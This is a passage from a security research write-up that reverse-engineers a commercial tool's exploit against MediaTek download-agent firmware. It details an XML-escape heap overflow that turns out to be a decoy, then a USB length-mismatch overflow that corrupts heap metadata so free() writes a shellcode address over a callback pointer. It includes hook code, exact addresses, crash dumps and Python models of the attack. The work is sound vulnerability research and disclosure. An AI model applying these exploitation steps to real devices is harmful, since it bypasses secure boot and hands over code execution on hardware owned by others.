      (_dest = (byte *)malloc(0x200), _dest == (byte *)0x0)) {
    return "";
  }
  pcVar2 = (char *)_dest;
  memset(_dest, 0, 0x200);
  if (src == (char *)0x0) {
    pcVar2 = "null";
  } else {
    pbVar3 = (byte *)pcVar2;
    if (len != 0) {
      uVar4 = (ulong)len;
      dest = (byte *)pcVar2;
      do {
        bVar1 = *src;
        if (bVar1 == 0x22) {
          memcpy(dest, "&quot;", 6);  // " -> 6 bytes
          pbVar3 = dest + 6;
        } else if (bVar1 == 0x26) {
          memcpy(dest, "&amp;", 5);   // & -> 5 bytes
          pbVar3 = dest + 5;
        } else if (bVar1 == '<') {
          memcpy(dest, "&lt;", 4);    // < -> 4 bytes
          pbVar3 = dest + 4;
        } else if (bVar1 == '>') {
          memcpy(dest, "&gt;", 4);    // > -> 4 bytes
          pbVar3 = dest + 4;
        } else {
          *dest = bVar1;
          pbVar3 = dest + 1;
        }
        src = (char *)((byte *)src + 1);
        uVar4 = uVar4 - 1;
        dest = pbVar3;
      } while (uVar4 != 0);
    }
    *pbVar3 = 0;
  }
  return (char *)(byte *)pcVar2;
}

Character	Expansion	Size
`"`	`&quot;`	6 bytes
`&`	`&amp;`	5 bytes
`<`	`&lt;`	4 bytes
`>`	`&gt;`	4 bytes

So if you send a filename containing 103 & characters, mxml_escape tries to write 103 * 5 = 515 bytes into a 512-byte buffer. Classic heap overflow.
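The expansion is easy to model on the host. The sketch below mirrors the logic of the decompiled `mxml_escape` (including the 0x200 cap applied by `strnlen` before the call), but it is a simulation written for illustration: `simulate_escape` and the constants are hypothetical names, and it only reports how far the output would run past the buffer.

```python
EXPANSIONS = {
    ord('"'): b"&quot;",
    ord("&"): b"&amp;",
    ord("<"): b"&lt;",
    ord(">"): b"&gt;",
}
BUF_SIZE = 0x200   # malloc(0x200) inside mxml_escape
NAME_CAP = 0x200   # strnlen(file_name, 0x200) in fp_read_host_file


def simulate_escape(name):
    """Return (expanded bytes, bytes written past the 0x200 buffer)."""
    # strnlen stops at the first NUL or at the cap, whichever comes first.
    capped = name.split(b"\0", 1)[0][:NAME_CAP]
    expanded = b"".join(EXPANSIONS.get(b, bytes([b])) for b in capped)
    # The trailing NUL terminator is not counted here.
    overflow = max(0, len(expanded) - BUF_SIZE)
    return expanded, overflow


expanded, overflow = simulate_escape(b"&" * 103)
print(len(expanded), overflow)
```

Feeding it 103 ampersands reproduces the 515-byte case from above, 3 bytes past the end of the buffer (4 if you count the terminator).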

The second AIO command Chimera sends uses exactly this technique: a filename stuffed with & characters.

We wrote a quick Python script to simulate the expansion and figure out how much they were overwriting:

Input size:    0x17ca (6090 bytes)
Capped size:   0x200 (512 bytes, capped by strnlen)
Expanded size: 0x2ac (684 bytes)
Buffer size:   0x200 (512 bytes)
Overflow:      0xac (172 bytes)

Special characters (in first 0x200 bytes):
  '&': 43 occurrences (215 bytes expanded)

Update (02/02/2026): Corrected overflow size, strnlen caps the filename to 512 bytes before expansion, so the actual overflow is 172 bytes, not 7.5KB.

That's a modest overflow: 172 bytes past the end of the buffer. The ~6KB filename Chimera sends is mostly theater. Only the first 512 bytes matter, and most of those are plain ; characters that don't expand at all.

But how exactly is this useful? What exactly is it overwriting?

Understanding the Heap

To understand how to exploit this overflow, we first need to understand how the heap works in both DAs.

MediaTek uses a simple heap implementation based on LK's (Little Kernel) miniheap.

Depending on the architecture, the DA uses slightly different implementations: miniheap.c for ARM64 and heap.c for ARM32. The core logic is mostly the same, but there are some differences in the metadata structures.

Initialization

One of the very first things DA2 does after booting is initialize its heap:

void init_heap(void)
{
    heap_init(0x4007f100, 0x32000000);
}

The heap_init function sets up a global structure called theheap that tracks the heap state:

/* ARM64 (miniheap.c) */
struct heap {
    void *base;                 // start of heap memory
    size_t len;                 // total heap size
    size_t remaining;           // bytes still available
    size_t low_watermark;       // lowest remaining value seen
    mutex_t lock;               // mutex for thread safety
    struct list_node free_list; // head of free chunk list
};

/* ARM32 (heap.c) */
struct heap {
    void *base;                 // start of heap memory
    size_t len;                 // total heap size
    struct list_node free_list; // head of free chunk list
};

This structure lives in DA2's .bss section, not on the heap itself. It holds references to where the heap starts, its size, and the head of the free list.

In this case, the heap starts at 0x4007F100 with a size of 0x32000000 (800MB). The base address varies between devices, but the size has remained the same across all DAs we've analyzed.

Heap Layout

The heap is divided into chunks laid out sequentially in memory. Each chunk can be either allocated or free, and they can appear in any order depending on the history of allocations and frees.

Something like ALLOC -> ALLOC -> FREE -> ALLOC is perfectly valid.

Each chunk starts with a header, followed by the body (user data when allocated, unused space when free). The header format differs between chunk types.

Free Chunks

Free chunks are linked together in a doubly-linked list so the allocator can quickly find available memory. The list is sorted by address, with lower addresses appearing first:

struct free_heap_chunk {
    struct list_node node;  // prev/next pointers (embedded struct)
    size_t len;             // total size of this chunk
};

The list_node struct is embedded as the first member:

struct list_node {
    struct list_node *prev;
    struct list_node *next;
};

Since list_node sits at offset 0, you can cast between free_heap_chunk* and list_node* freely.
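When staring at a raw heap dump, it's convenient to overlay these structures on the bytes. Here's a sketch using `ctypes` with fixed 64-bit fields to mimic the ARM64 layout (pointers and `size_t` are both 8 bytes there). The class names and `parse_free_chunk` are hypothetical, and the sample values are made up for the demo.

```python
import ctypes


class ListNode(ctypes.LittleEndianStructure):
    _fields_ = [("prev", ctypes.c_uint64), ("next", ctypes.c_uint64)]


class FreeHeapChunk(ctypes.LittleEndianStructure):
    _fields_ = [("node", ListNode), ("len", ctypes.c_uint64)]


def parse_free_chunk(raw):
    """Overlay a free chunk header on the first 24 bytes of a dump slice."""
    return FreeHeapChunk.from_buffer_copy(raw[:ctypes.sizeof(FreeHeapChunk)])


# node sits at offset 0, so the same bytes are valid as a ListNode too.
assert FreeHeapChunk.node.offset == 0
assert FreeHeapChunk.len.offset == 16
assert ctypes.sizeof(FreeHeapChunk) == 24

# Made-up header: prev, next, len.
sample = b"".join(v.to_bytes(8, "little") for v in (0x40070000, 0x40300000, 0x1000))
chunk = parse_free_chunk(sample)
node = ListNode.from_buffer_copy(sample[:16])
print(hex(chunk.node.next), hex(node.next), hex(chunk.len))
```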

Allocated Chunks

Allocated chunks are not linked together. They simply sit in memory with a header placed immediately before the user data:

struct alloc_struct_begin {
    unsigned int magic;  // 0x68656170 ('heap'), ARM32 only
    void *ptr;           // pointer to the start of the chunk (header included)
    size_t size;         // total size of the chunk (header + user data)
};

The ptr field points back to where the chunk actually starts in memory. This is needed because alignment requirements might add padding between the header and user data, so when freeing, the allocator needs to know where the chunk originally began.

The most notable difference between architectures is that ARM32 allocations include a magic field set to 0x68656170 ('heap'), while ARM64 does not (it's only included when LK_DEBUGLEVEL > 1, which we've never seen enabled in production DAs).
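Given a user pointer found in a dump, the header can be read by stepping back by its size. The sketch below assumes the fields are packed back to back with no padding (16 bytes on ARM64, 12 on ARM32), which matches the struct as shown but is still an assumption. `read_alloc_header` is a hypothetical helper and the sample values are made up.

```python
import struct

HEAP_MAGIC = 0x68656170
ARM64_HDR = struct.Struct("<QQ")    # ptr, size
ARM32_HDR = struct.Struct("<III")   # magic, ptr, size


def read_alloc_header(mem, user_off, arm64=True):
    """Read the allocation header sitting right before user_off in mem."""
    fmt = ARM64_HDR if arm64 else ARM32_HDR
    fields = fmt.unpack_from(mem, user_off - fmt.size)
    if arm64:
        ptr, size = fields
        return {"ptr": ptr, "size": size}
    magic, ptr, size = fields
    if magic != HEAP_MAGIC:
        raise ValueError(f"bad magic {magic:#x}")
    return {"magic": magic, "ptr": ptr, "size": size}


# The magic really is the ASCII string 'heap'.
assert HEAP_MAGIC.to_bytes(4, "big") == b"heap"

# Made-up ARM64 chunk: 16-byte header followed by user data.
mem64 = ARM64_HDR.pack(0x40308000, 0x30) + b"A" * 0x20
print(read_alloc_header(mem64, ARM64_HDR.size))
```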

Allocation

When you call malloc(size), the heap:

Adds sizeof(struct alloc_struct_begin) to the requested size
Rounds up to pointer alignment
Walks the free list from the head and uses the first chunk that fits (first-fit allocation)
If the chunk is larger than needed, splits it: one part becomes allocated, the remainder stays free
Stores the allocation metadata just before the returned pointer

Since the free list is sorted by address, lower addresses tend to get allocated first, though this depends on the current fragmentation state.

Free

When you call free(ptr), the heap:

Reads the alloc_struct_begin metadata before the pointer
Creates a new free chunk from the allocation
Inserts it back into the free list (sorted by address), merging with adjacent free chunks if possible
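The allocation and free steps above can be sketched as a toy allocator. This is a simplified model for reasoning about layouts, not the LK code: `ToyHeap` is a hypothetical class, the 16-byte header and 8-byte alignment are assumptions for ARM64, and it always splits a larger chunk, whereas a real implementation may skip the split when the remainder is too small to hold a free chunk header.

```python
HEADER = 16   # assumed sizeof(struct alloc_struct_begin) on ARM64
ALIGN = 8     # assumed pointer alignment


class ToyHeap:
    def __init__(self, base, size):
        self.free_list = [(base, size)]   # (address, length), sorted by address
        self.allocated = {}               # user pointer -> (chunk address, length)

    def malloc(self, size):
        need = (size + HEADER + ALIGN - 1) & ~(ALIGN - 1)
        # First fit: walk from the lowest address and take the first match.
        for i, (addr, length) in enumerate(self.free_list):
            if length >= need:
                if length > need:
                    # Split: the front is allocated, the remainder stays free.
                    self.free_list[i] = (addr + need, length - need)
                else:
                    del self.free_list[i]
                self.allocated[addr + HEADER] = (addr, need)
                return addr + HEADER
        return None

    def free(self, ptr):
        addr, length = self.allocated.pop(ptr)
        self.free_list.append((addr, length))
        self.free_list.sort()
        # Merge neighbours that touch each other.
        merged = []
        for a, l in self.free_list:
            if merged and merged[-1][0] + merged[-1][1] == a:
                merged[-1] = (merged[-1][0], merged[-1][1] + l)
            else:
                merged.append((a, l))
        self.free_list = merged
```

The useful property for exploitation is visible even in this toy: freeing a low-address chunk and then allocating something of equal or smaller size hands the same address back.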

Exploiting the Free List

This same allocator has been the target of previous research. Quarkslab's "When Samsung meets MediaTek" paper exploited a heap overflow in Samsung's bootloader by abusing the free list unlink operation, so we decided to look at the same primitive.

When a chunk is removed from the free list during allocation, list_delete performs a classic unlink:

static inline void list_delete(struct list_node *item)
{
    item->next->prev = item->prev;
    item->prev->next = item->next;
    item->prev = item->next = 0;
}

If we can overflow into a free chunk and corrupt its prev/next pointers, we get a write-what-where primitive when that chunk gets unlinked. It's a classic technique, but still effective when there's no heap hardening.
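To see why the unlink gives a write primitive, here's `list_delete` replayed against a dictionary standing in for memory, using the ARM64 layout (`prev` at offset 0, `next` at offset 8). The addresses are made up for the demo and `Memory` is a hypothetical helper.

```python
class Memory:
    """Sparse 64-bit memory: address -> qword."""

    def __init__(self):
        self.cells = {}

    def read(self, addr):
        return self.cells.get(addr, 0)

    def write(self, addr, value):
        self.cells[addr] = value


PREV, NEXT = 0, 8   # field offsets inside struct list_node on ARM64


def list_delete(mem, item):
    prev = mem.read(item + PREV)
    nxt = mem.read(item + NEXT)
    mem.write(nxt + PREV, prev)    # item->next->prev = item->prev
    mem.write(prev + NEXT, nxt)    # item->prev->next = item->next
    mem.write(item + PREV, 0)
    mem.write(item + NEXT, 0)


# Made-up addresses: a corrupted free chunk, a target, and a value to plant.
CHUNK, WHERE, WHAT = 0x40300000, 0x40071000, 0x40308C18
mem = Memory()
mem.write(CHUNK + PREV, WHAT)    # attacker-controlled prev
mem.write(CHUNK + NEXT, WHERE)   # attacker-controlled next
list_delete(mem, CHUNK)
print(hex(mem.read(WHERE)), hex(mem.read(WHAT + NEXT)))
```

Note the side effect: the unlink also writes `WHERE` to `WHAT + 8`, so whatever `WHAT` points to has to be writable and has to tolerate having 8 bytes clobbered at that offset.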

Debugging the Heap

At this point, we understood the heap internals and had a potential overflow primitive. But to actually exploit it, we needed to know the exact heap state when the overflow happens: what's allocated, what's free, and where everything sits in memory.

The Quarkslab researchers faced a similar challenge and solved it by dumping the heap and emulating it offline. We wanted to do the same, but there was a problem: we had no easy way to read memory from the device.

On older devices, you could use Carbonara to get arbitrary read/write in DA1. But our target's DA1 was already patched against Carbonara, so that wasn't an option.

A Crazy Idea

Then I remembered a project I'd released the previous year: fenrir. To understand what it does, you need to know how MediaTek's boot chain works:

The LK partition actually contains an image with multiple sub-partitions inside:

----------------------------------------
1. lk (927248 bytes)
2. bl2_ext (659112 bytes)
3. aee (885416 bytes)
4. lk_main_dtb (289015 bytes)
5. lk_dtbo (164385 bytes)
----------------------------------------

The important thing is that Preloader loads and jumps to bl2_ext while still running at EL3 (the highest ARM privilege level), expecting it to drop privileges and continue the boot chain. From there, bl2_ext verifies and loads everything that comes after it.

fenrir exploits a logic flaw where this sub-partition isn't properly verified when seccfg is unlocked. By patching the original to skip verification of subsequent partitions, you can boot unsigned or patched LK sub-partitions:

[PART] img_auth_required = 0
[PART] Image with header, name: bl2_ext, addr: FFFFFFFFh, mode: FFFFFFFFh, size:654944, magic:58881688h
[PART] part: lk_a img: bl2_ext cert vfy(0 ms)
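The fields in that `[PART]` line map onto the header that precedes each sub-image. Here's a sketch of a parser for it. The layout used here (magic, size, 32-byte name, address, mode at the start of the header) is an assumption based on the commonly seen MediaTek image header, not something shown in this post, and `parse_part_header` is a hypothetical helper. The demo header is built from the values in the log line.

```python
import struct

PART_MAGIC = 0x58881688
# Assumed layout: magic, data size, name[32], load address, mode.
PART_HDR = struct.Struct("<II32sII")


def parse_part_header(blob):
    """Parse the leading fields of a sub-image header."""
    magic, dsize, name, maddr, mode = PART_HDR.unpack_from(blob, 0)
    if magic != PART_MAGIC:
        raise ValueError(f"unexpected magic {magic:#x}")
    return {
        "name": name.split(b"\0", 1)[0].decode("ascii"),
        "size": dsize,
        "addr": maddr,
        "mode": mode,
    }


# Synthetic header using the values printed by the Preloader above.
demo = PART_HDR.pack(PART_MAGIC, 654944, b"bl2_ext", 0xFFFFFFFF, 0xFFFFFFFF)
info = parse_part_header(demo)
print(info["name"], info["size"], hex(info["addr"]))
```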

But for this research, we needed something more powerful. We didn't just want to skip verification, we wanted to patch Preloader's memory directly and re-execute certain routines, like the handshake handler.

So I wrote sprig, a complete replacement for bl2_ext. Instead of patching the original, this payload takes its place entirely.

Preloader loads it expecting the real thing, but instead of continuing the boot chain, it runs at EL3 in the same context as Preloader itself.

The initial version was simple: disable SBC, SLA, and DAA checks, then jump back to Preloader's handshake handler.

This let us load unmodified DAs through penumbra, upload a test file using the AIO command, and then dump the heap to see exactly where our data ended up.

With the heap dumped, the next step was to find where the AIO signature data landed and start mapping out the heap layout.

I fired up a hex editor and searched for AAAAAAAAAAAAAAAA..., which is what our test payload consisted of.

...and there it was! By analyzing the header, we can see this chunk is allocated (size = 0x200018) and sits at 0x40308BF8.

Since size matters, we repeated the upload with whatever Chimera sends as the first AIO signature. This time it landed at 0x40308C18 with a size of 0x1E0230 bytes.

Dynamic Heap Analysis

Now we knew where our data landed, but we needed more: what's around it, how the heap evolves during the exploit, and ideally, real-time dumps as things happen.

Since we had no control over what Chimera sends, we needed to be there before Chimera feeds the device with its DAs and commands.

Extending sprig

Everything flows through Preloader first. DA1 gets downloaded and verified by Preloader, then DA1 downloads and verifies DA2. If we could hook each stage as it loads, we could patch anything we wanted.

So I extended sprig to install hooks at multiple points in the boot chain:

Preloader hook: Right after Preloader receives and verifies DA1, but before jumping to it. This lets us patch DA1 in memory.
DA1 hook: Right after DA1 receives and verifies DA2, but before jumping to it. This lets us patch DA2 in memory.

For DA1, the first thing I did was force the log level to DEBUG regardless of what the host requests:

static void da1_init_hook(void) {
    printf("DA1 init hook\n");

    /* force log level to DEBUG */
    writel(0x52800028, 0x40200EC4);
    flush_dcache_range(0x40200EC4, 4);
    invalidate_icache();

    hook_install(&(hook_t)HOOK(0x40200B50, 0x402010AC, da2_init_hook, "da2_init"));
}

This simple patch meant we'd get full UART output from both DAs, regardless of Chimera trying to silence them with da_log_level=ERROR.
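For the curious, the word written by the hook decodes to a single `mov`. The sketch below decodes only the 32-bit MOVZ form and is not a general disassembler; `decode_movz32` is a hypothetical helper. That the immediate 1 corresponds to DEBUG is taken from the hook's comment, not derived here.

```python
def decode_movz32(word):
    """Return the assembly text for a 32-bit MOVZ, or None."""
    # Bits 31..23 of MOVZ (32-bit) are fixed: sf=0, opc=10, 100101
    if (word >> 23) != 0b010100101:
        return None
    hw = (word >> 21) & 0x3          # shift amount in units of 16 bits
    if hw > 1:
        return None                  # only 0 or 16 are valid for 32-bit
    imm16 = (word >> 5) & 0xFFFF
    rd = word & 0x1F
    reg = "wzr" if rd == 31 else f"w{rd}"
    return f"mov {reg}, #{imm16 << (16 * hw):#x}"


print(decode_movz32(0x52800028))
```

So the patch replaces whatever instruction sat at 0x40200EC4 with one that loads the constant 1 into w8.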

Hooking DA2

Once DA2 loads, the real fun begins. Based on what we'd seen in the USB capture, we knew the exploit involved heap allocations, XML parsing, and some kind of error condition.

So I installed hooks on the functions that seemed most relevant:

static void da2_init_hook(void) {
    printf("DA2 init hook\n");

    hook_install(&(hook_t)HOOK(0x4000749C, 0x400066AC, free_on_abort_hook, "free_on_abort"));
    hook_install(&(hook_t)HOOK(0x4002AAB0, 0x4000687C, malloc_for_file_hook, "malloc_for_file"));
    hook_install(&(hook_t)HOOK(0x4002A9F0, 0x400067BC, error_path_hook, "error_path_1"));
    hook_install(&(hook_t)HOOK(0x4002AA88, 0x400068CC, error_path_hook, "error_path_2"));
    hook_install(&(hook_t)HOOK(0x4000FBE0, 0x4000693C, mxml_free_hook, "mxml_free"));
    hook_install(&(hook_t)HOOK(0x4000fcac, 0x40006E1C, mxml_inner_free_hook, "mxml_inner_free"));
    hook_install(&(hook_t)HOOK(0x4002A554, 0x40006B9C, mxml_escape_malloc_hook, "mxml_escape_malloc"));
    hook_install(&(hook_t)HOOK(0x4002A8F4, 0x40006D6C, mxml_escape_hook, "mxml_escape"));
}

malloc_for_file_hook: Tracks where fp_read_host_file allocates buffers for incoming data
mxml_escape_malloc_hook: Tracks the 0x200-byte buffer allocation in mxml_escape
mxml_escape_hook: Dumps the escaped output to see if/how it overflows
error_path_hook: Catches when fp_read_host_file hits an error
free_on_abort_hook: Monitors what gets freed during error handling
mxml_free_hook: Tracks when the XML tree gets cleaned up
mxml_inner_free_hook: Tracks the individual free() calls inside mxml_free for node data

Each hook logs its arguments, dumps relevant memory regions, and traces the heap state.

Heap Layout

With the previous hooks in place, we ran Chimera again and watched the UART output. The heap layout became clear:

The second AIO command carries a huge filename full of special characters. This does two things:

Heap shaping: mxmlLoadString allocates a buffer for the filename string, which ends up right after the AIO2 data buffer due to the allocation size.
XML expansion overflow: When mxml_escape processes the special characters, it expands them (& → &amp;, etc.) and overflows into the AIO1 shellcode buffer.

A Dead End: The XML Overflow

We initially thought the XML expansion was the exploit. After all, it's still a heap overflow, 172 bytes past the end of the buffer.

When the second AIO command arrives, mxml_escape processes the long filename full of special characters.

The expanded output overflows past the 0x200-byte buffer and corrupts the AIO signature buffer 1 that sits right after it.

Remember what happens in set_all_in_one_signature_buffer:

if (_g_ext_all_in_one_sig != (uint8_t *)0x0) {
    free(_g_ext_all_in_one_sig);
}

If a previous AIO signature exists, it gets freed before storing the new one. So when the second AIO command completes successfully, the corrupted AIO buffer 1 gets freed.

We tried to replicate this ourselves: send the first AIO, then send the second AIO with the malicious filename, but without aborting like Chimera does. The result was a crash:

data fault: PC at 0x40009ec4, FAR 0x6d61263b3b3b747c, iss 0x61
ESR 0x96000061: ec 0x25, il 0x2000000, iss 0x61
iframe 0x402836d0:
x0  0x6d61263b3b3b746c x1  0x              3a x2  0x        40075820 x3  0x        40075840
x4  0x        40043d6f x5  0x        400441e7 x6  0x              58 x7  0x              78
x8  0x6d61263b3b3b746c x9  0x3b3b3b3b3b3b3b70 x10 0x             657 x11 0x             654
x12 0x        31bb1508 x13 0x        40070160 x14 0x              68 x15 0x        40282fbf
x16 0xfffffffffffffe02 x17 0x        400441a6 x18 0x               d x19 0x              3a
x20 0x        403084e0 x21 0x        40076000 x22 0x        40070000 x23 0x        40287e40
x24 0x        40070000 x25 0x        40008db8 x26 0x        40055000 x27 0x        40070000
x28 0x               0 x29 0x        402837e0 lr  0x        4002ccbc usp 0x99b04a2404743432
elr 0x        40009ec4
spsr 0x        6200038d
#die sync exception.

Looking at the decompiled DA2, the crash happens in free():

free:
    40009eb8  cbz   ptr, LAB_40009ecc
    40009ebc  ldp   x8, x9, [ptr, #-0x10]   ; load chunk header
    40009ec0  mov   ptr, x8
    40009ec4  str   x9, [x8, #0x10]         ; CRASH HERE

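The FAR shows 0x6d61263b3b3b747c, which is x8 + 0x10, the address the str tried to write to. Read as ASCII, the hex digits spell ma&;;;t| (in little-endian memory order, x8 itself is lt;;;&am), basically corrupted data from the XML expansion overwriting the chunk header.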
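For anyone who wants to check the decoding by hand, here is a minimal sketch. Python is used purely for illustration and is not part of the original tooling; the two constants are copied from the crash dump above.

```python
import struct

X8 = 0x6D61263B3B3B746C   # x8 from the crash dump (the bogus "chunk pointer")
FAR = 0x6D61263B3B3B747C  # faulting address reported by the exception

# free() executes `str x9, [x8, #0x10]`, so the fault address is x8 + 0x10.
assert X8 + 0x10 == FAR

# The DA runs little-endian, so memory order is the reverse of the hex literal.
in_memory = struct.pack("<Q", X8).decode("ascii")
as_printed = struct.pack(">Q", FAR).decode("ascii")

print(in_memory)   # bytes as they sit in the corrupted chunk header
print(as_printed)  # the FAR value read left to right from the dump
```

The in-memory form looks like fragments of expanded entities mixed with literal semicolons, which fits the idea that the header was overwritten by escaped filename data.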

At first, this seemed promising: if we could control the chunk metadata with the overflow, maybe we could turn this into an arbitrary write during free().

But there's a problem: we can't send arbitrary bytes in the XML filename. Special characters get entity-encoded (& becomes &amp;, etc.), and null bytes get rejected by the XML parser entirely.

To craft a fake chunk header, we'd need to overwrite ptr and size in the alloc_struct_begin with controlled values.

For example, to fake a pointer like 0x40070028, we'd need to send bytes 28 00 07 40 00 00 00 00, but those null bytes are impossible to include in an XML string.
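The constraint is easy to see in a small sketch. The helper below is a simplified, hypothetical model: the exact set of characters the DA's XML code rewrites is an assumption here, only the NUL rejection and the & expansion are stated above.

```python
import struct

def can_travel_in_xml_string(raw: bytes) -> bool:
    """Simplified model: NUL is rejected, and a few characters get rewritten."""
    # Assumed set of problematic bytes: NUL plus the usual XML specials.
    forbidden = {0x00, ord("&"), ord("<"), ord(">"), ord('"')}
    return not any(b in forbidden for b in raw)

fake_ptr = struct.pack("<Q", 0x40070028)   # 64-bit little-endian pointer
print(fake_ptr.hex(" "))                   # 28 00 07 40 00 00 00 00
print(can_travel_in_xml_string(fake_ptr))  # False
```

Any address in the 0x4xxxxxxx range has zero upper bytes when stored as a 64-bit value, so every useful pointer hits the same wall.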

After countless hours of brainstorming, experimenting with different character combinations, and desperately searching for some way to sneak controlled bytes through the XML parser, we finally admitted defeat. The XML overflow, despite its impressive size, simply wasn't exploitable.

Which meant Chimera had to be doing something else entirely. The XML expansion overflow was a red herring, likely included to confuse people like us :P.

(and it actually did, we wasted way more time than we'd like to admit trying to make something useful out of it).

The Real Exploit: USB Overflow

Going back to the USB capture, we focused on why Chimera was aborting the second AIO command instead of completing it normally.

While analyzing more closely, we noticed something odd about how Chimera sends the second AIO file.

According to the V6 protocol, before sending file data, the host advertises how many bytes the DA should expect. Looking at the capture:

4F 4B 40 35 31 31 36 20  ->  "OK@5116"

So they tell the DA they'll send 0x13FC bytes (5116 in decimal). But the actual payload size was 0x2410 bytes, nearly twice as much.

We went back to fp_read_host_file and looked at the download loop more carefully:

advertised_size = atoll(vec[1]); // size from host (0x13fc)

*out_data_len = (uint)advertised_size;
buffer = (char *)malloc(advertised_size + 4); // allocate with 4-byte overhead
*out_data = buffer;

(*channel->write)((uint8_t *)"OK", 3);

if (advertised_size != 0) {
    bytes_received = 0;
    do {
        // ... read OK from host ...
        (*channel->write)((uint8_t *)"OK", 3);
        chunk_len = packet_size; // 0x20000 bytes max per USB packet
        status = (*channel->read)((uint8_t *)(buffer + bytes_received), &chunk_len);
        if (status != 0) goto usb_error;
        bytes_received = bytes_received + chunk_len;
        (*channel->write)((uint8_t *)"OK", 3);
    } while (bytes_received != advertised_size);
}

The DA allocates a buffer based on advertised_size plus a 4-byte overhead (probably for a null terminator or length field), but the read loop uses packet_size (0x20000) for each chunk, not the remaining bytes.

The loop only terminates when bytes_received == advertised_size, so if the host advertises a small size but sends more data than that, the DA will happily write past the end of the allocated buffer.

In Chimera's case:

Host advertises 0x13FC bytes
DA allocates 0x1400 bytes (0x13FC + 4 overhead)
Host actually sends 0x1410 bytes
The DA reads the full chunk, overflowing by 0x10 bytes into the next chunk's header

And since we're sending raw USB data (not XML-encoded strings), we have full control over every byte, including null bytes!
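The mismatch can be reproduced with a toy model of the loop. This is only a sketch: read_host_file here is a hypothetical Python stand-in that counts bytes instead of touching memory, and running out of chunks stands in for the host aborting the command.

```python
def read_host_file(advertised_size, incoming_chunks, packet_size=0x20000):
    """Toy model of the vulnerable loop; returns bytes written past the buffer."""
    alloc_size = advertised_size + 4           # malloc(advertised_size + 4)
    bytes_received = 0
    for chunk in incoming_chunks:
        # The DA accepts up to packet_size bytes, regardless of what is left.
        chunk_len = min(len(chunk), packet_size)
        bytes_received += chunk_len
        if bytes_received == advertised_size:  # the only exit condition
            break
    return max(0, bytes_received - alloc_size)

overflow = read_host_file(0x13FC, [b"\x41" * 0x1410])
print(hex(overflow))  # 0x10
```

With an honest host that sends exactly 0x13FC bytes, the same function returns 0.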

The Write Primitive

On ARM64, the allocated chunk header looks like:

+0x00: ptr   (8 bytes) - pointer to chunk start
+0x08: size  (8 bytes) - allocation size
+0x10: data  (user data starts here)

When free() is called on a chunk, it does:

free:
    cbz    ptr, return           ; if (ptr == NULL) return
    ldp    x8, x9, [ptr, #-0x10] ; x8 = alloc.ptr, x9 = alloc.size
    mov    ptr, x8               ; chunk = alloc.ptr
    str    x9, [x8, #0x10]       ; chunk->len = alloc.size  <-- the write
    b      heap_insert_free_chunk

What matters here is str x9, [x8, #0x10]. It writes alloc.size to alloc.ptr + 0x10.

If we can control both ptr and size in the chunk header through our overflow, we get an arbitrary write primitive: write size to ptr + 0x10.
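As a rough illustration, the store can be modelled in a few lines. This sketch only reproduces the first write performed by free(); the dictionary standing in for memory and the example values are hypothetical.

```python
import struct

HEADER_SIZE = 0x10  # ptr (8 bytes) + size (8 bytes), as in the layout above

def free_write(memory: dict, header: bytes) -> None:
    """Model only the first store of free(): *(ptr + 0x10) = size."""
    ptr, size = struct.unpack("<QQ", header[:HEADER_SIZE])
    memory[ptr + 0x10] = size

memory = {}
# Hypothetical values: any attacker-chosen ptr/size pair behaves the same way.
free_write(memory, struct.pack("<QQ", 0x1000, 0xDEADBEEF))
print({hex(k): hex(v) for k, v in memory.items()})
```

Whatever ends up in the size field is written verbatim, so the value is as controllable as the destination.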

Targeting DPC

Now we need a target for our write. We need a function pointer at a known address that gets called regularly.

Looking at the DA2 command loop, we found exactly that: the DPC (Deferred Procedure Call) structure. At the end of each command iteration, the DA checks if there's a pending callback:

if (get_cmd_dpc()->cb != 0) {
    LOGD("\n@Protocol: DPC CALL\n");
    get_cmd_dpc()->cb(get_cmd_dpc()->arg);
    // ...
}

The DPC structure is simple:

struct cmd_dpc_t {
    const char *key;
    cmd_dpc_cb cb;   // <- function pointer
    void *arg;
};

It's used by commands that need to do something after the command response is sent, like rebooting or switching USB speed. The structure lives at a fixed address in .bss, and cb gets called if it's non-null.

Perfect target. If we overwrite cb with our shellcode address, the DA will call it for us at the end of the command loop.

On our device, the DPC structure lives at:

0x40070030: key
0x40070038: cb    <- function pointer we want to overwrite
0x40070040: arg

Our overflow writes into the XML filename buffer's header:

0x4530bda8: ptr  = 0x40070028     (0x10 bytes before dpc->cb)
0x4530bdb0: size = shellcode_addr
0x4530bdb8: data = "file_name..." (the huge filename)

When the command is aborted, mxmlDelete cleans up the XML tree and calls free() on the filename buffer. The corrupted header causes free() to:

Read ptr = 0x40070028 and size = shellcode_addr from the header
Execute str x9, [x8, #0x10] -> writes shellcode_addr to 0x40070028 + 0x10 = 0x40070038
0x40070038 is dpc->cb -> shellcode address written!

After the command ends, the DA's main loop checks dpc->cb, sees it's non-null, and calls it, jumping straight into our shellcode.
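The address arithmetic above can be double-checked with a short sketch. The DPC addresses come from the listing above; fake_chunk_header and the shellcode address are hypothetical and only serve the example.

```python
import struct

DPC_BASE = 0x40070030       # address of the DPC structure on this device
DPC_CB = DPC_BASE + 0x08    # cb sits right after the 8-byte key pointer

def fake_chunk_header(target_addr: int, value: int) -> bytes:
    """16-byte header that makes free() store `value` at `target_addr`."""
    return struct.pack("<QQ", target_addr - 0x10, value)

SHELLCODE_ADDR = 0x44C7F100  # placeholder value, not taken from a real run
header = fake_chunk_header(DPC_CB, SHELLCODE_ADDR)
ptr, size = struct.unpack("<QQ", header)
print(hex(ptr), hex(ptr + 0x10), hex(size))
```

These 16 bytes are exactly what the 0x10-byte USB overflow has to deliver into the neighbouring chunk.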

Putting It All Together

So, to recap the full exploit chain:

Send a first AIO command with our shellcode payload
Send a second AIO command with a crafted filename that shapes the heap
Advertise a smaller size than we actually send, overflowing into the XML filename buffer's header
Set ptr to dpc->cb - 0x10 (0x40070028 on our device) and size to our shellcode address
Abort the command, triggering mxmlDelete -> free() -> arbitrary write
DPC callback gets overwritten, shellcode executes on next command loop iteration

We called it heapb8 (heapbait), because after getting baited by Chimera's XML overflow decoy, the name just felt right :).

The next step was to make the exploit generic across devices and integrate it into penumbra.

Predicting the Heap Layout

While reimplementing the exploit, we realized the original approach was unnecessarily complicated.

There are two separate allocations involving the filename:

mxml_escape buffer (0x200 bytes, static): Allocated once and reused. The XML expansion overflows this buffer, but since it's static, it doesn't affect heap layout at all.
XML filename node buffer (dynamic): When mxmlLoadString parses the command, it allocates storage for the filename string. This allocation depends on the filename length before escaping, and this is what actually shapes the heap.

The original exploit used a filename stuffed with special characters, presumably to trigger the XML expansion.

But that expansion only affects the static mxml_escape buffer, it has nothing to do with where the filename node ends up on the heap.

